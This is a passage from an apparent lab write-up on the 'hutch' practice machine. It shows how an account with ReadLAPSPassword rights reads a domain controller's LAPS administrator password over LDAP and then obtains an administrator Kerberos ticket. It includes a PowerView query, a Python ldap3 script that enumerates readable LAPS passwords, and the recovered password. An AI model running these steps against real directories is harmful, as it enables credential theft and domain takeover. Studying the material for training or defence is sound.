ReadLAPSPassword
As discovered during the BloodHound session, the fmcsorley user has the ReadLAPSPassword edge to the hutchdc.hutch.offsec host.
While there are multiple ways to abuse the ReadLAPSPassword privilege granted to the compromised user, it is worth understanding where the password actually lives: the legacy LAPS schema extension adds the ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime attributes to computer objects, so the local administrator password of every managed machine is stored, in cleartext, on that machine's computer object in Active Directory. ms-Mcs-AdmPwd is marked as a confidential attribute, so only principals explicitly granted read access to it (the right BloodHound reports as ReadLAPSPassword) can retrieve it.
Consequently, the password can be read remotely with a plain LDAP query, with no PowerShell or SMB session on the target required. Anyone holding read rights on that attribute effectively holds the local administrator credentials of the machine, which is why this permission is a security risk when granted too broadly.
It can therefore be retrieved with an LDAP query:
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ KRB5CCNAME=fmcsorley@hutchdc.hutch.offsec.ccache powerview HUTCH.OFFSEC/fmcsorley@hutchdc.hutch.offsec -k --no-pass --dc-ip $IP -ns $IP -q 'Get-DomainObject "CN=HUTCHDC,OU=DOMAIN CONTROLLERS,DC=HUTCH,DC=OFFSEC" -ResolveGUIDs' | grep -i ms-Mcs-AdmPwd
[2025-05-01 16:06:45] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ms-Mcs-AdmPwd : 8(31je1dN1EtuX
ms-Mcs-AdmPwdExpirationTime : 133931679179139426
While any LDAP tool can be used for the query, I find the Python implementation of PowerView convenient because it accepts the Kerberos TGT from the ccache directly. ms-Mcs-AdmPwd is the LDAP attribute that stores the LAPS password; ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC) marking when the password will next be rotated, here 2025-05-31 12:25:17 UTC, roughly 30 days after the capture, which matches the default LAPS password age of 30 days.
The LAPS password is 8(31je1dN1EtuX
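As an added example (not part of the original write-up or of PowerView), the following Python script performs the same retrieval generically: it binds to the DC with ldap3 (the ldap3 package is an assumption; Kerberos binding is also possible but NTLM is used here for simplicity), searches for every computer whose ms-Mcs-AdmPwd the bound principal can read, and decodes the FILETIME expiration. The confidential-attribute behaviour is what makes the `(ms-Mcs-AdmPwd=*)` filter useful: computers you cannot read simply do not match. The sample entries at the bottom are constructed to mirror the HUTCHDC values above so the decoding logic can be run offline.

```python
"""Enumerate legacy LAPS (ms-Mcs-AdmPwd) passwords readable by the bound
principal and decode their expiration timestamps.

Added example, not the write-up's or PowerView's code. The LDAP query
assumes the ldap3 package; the sample entries are constructed to mirror
the HUTCHDC output from the write-up.
"""
from datetime import datetime, timedelta, timezone

# Windows FILETIME epoch: 100 ns ticks since 1601-01-01 00:00 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# ms-Mcs-AdmPwd is a confidential attribute, so the (ms-Mcs-AdmPwd=*)
# clause only matches computers whose password the bound principal may
# read. Every object returned therefore has a readable LAPS password.
LAPS_FILTER = "(&(objectClass=computer)(ms-Mcs-AdmPwd=*))"
LAPS_ATTRS = ["dNSHostName", "ms-Mcs-AdmPwd", "ms-Mcs-AdmPwdExpirationTime"]


def filetime_to_datetime(filetime):
    """Convert a FILETIME (int or decimal string) to an aware UTC datetime."""
    ticks = int(filetime)
    if ticks < 0:
        raise ValueError("FILETIME cannot be negative")
    # timedelta is microsecond-granular; drop the sub-microsecond digit.
    return _FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def _first(value):
    """ldap3 may hand back single values or lists; normalise to a scalar."""
    if isinstance(value, list):
        return value[0] if value else None
    return value


def summarize_laps_entries(entries, now=None):
    """Turn raw LDAP entries into rows of host, password, expiry, expired flag.

    `entries` follows the shape ldap3 puts in conn.response:
    {"dn": ..., "attributes": {...}}. Entries without a readable password
    (for example when the filter above is omitted) are skipped.
    """
    now = now or datetime.now(timezone.utc)
    rows = []
    for entry in entries:
        attrs = entry.get("attributes") or {}
        pwd = _first(attrs.get("ms-Mcs-AdmPwd"))
        if not pwd:
            continue
        exp_raw = _first(attrs.get("ms-Mcs-AdmPwdExpirationTime"))
        expires = filetime_to_datetime(exp_raw) if exp_raw else None
        host = _first(attrs.get("dNSHostName")) or entry.get("dn")
        rows.append({
            "host": host,
            "password": pwd,
            "expires": expires,
            # An expired password is still valid until the LAPS client on
            # the host next runs and rotates it.
            "expired": bool(expires and expires <= now),
        })
    return rows


def query_laps(dc_ip, domain, username, password, base_dn):
    """Bind to the DC over LDAP with NTLM and return readable LAPS rows.

    Network call; not exercised offline. ldap3 is imported lazily so the
    decoding helpers above work without it installed.
    """
    import ldap3  # assumption: pip install ldap3

    server = ldap3.Server(dc_ip, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, user=f"{domain}\\{username}",
                            password=password, authentication=ldap3.NTLM,
                            auto_bind=True)
    conn.search(base_dn, LAPS_FILTER, attributes=LAPS_ATTRS)
    return summarize_laps_entries(
        [r for r in conn.response if r.get("type") == "searchResEntry"])


# Constructed sample mirroring the values read from HUTCHDC in the write-up.
SAMPLE_ENTRIES = [
    {"type": "searchResEntry",
     "dn": "CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec",
     "attributes": {"dNSHostName": "hutchdc.hutch.offsec",
                    "ms-Mcs-AdmPwd": "8(31je1dN1EtuX",
                    "ms-Mcs-AdmPwdExpirationTime": "133931679179139426"}},
    # Constructed: a computer whose password attribute is not readable by
    # the caller (as returned without the filter). It must be skipped.
    {"type": "searchResEntry",
     "dn": "CN=WS01,CN=Computers,DC=hutch,DC=offsec",
     "attributes": {"dNSHostName": "ws01.hutch.offsec"}},
]

if __name__ == "__main__":
    for row in summarize_laps_entries(SAMPLE_ENTRIES):
        print(f"{row['host']}: {row['password']} "
              f"(expires {row['expires']:%Y-%m-%d %H:%M:%S %Z}, "
              f"expired={row['expired']})")
```

Run as-is to decode the constructed sample; point `query_laps()` at a DC with the fmcsorley credentials to reproduce the PowerView result against the live environment. Pairing the password with the decoded expiration matters operationally: a password read shortly before rotation may stop working before you use it.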
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ impacket-getTGT HUTCH.OFFSEC/administrator@hutchdc.hutch.offsec -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: 8(31je1dN1EtuX
[*] Saving ticket in administrator@hutchdc.hutch.offsec.ccache
Validated: a TGT was issued for the administrator account, so the LAPS password is the current password of that account. Because HUTCHDC is a domain controller, the "local" Administrator account that LAPS manages on it is the domain's built-in Administrator, which is why a Kerberos TGT for HUTCH.OFFSEC/administrator can be obtained with it.
Moving on to the Privilege Escalation phase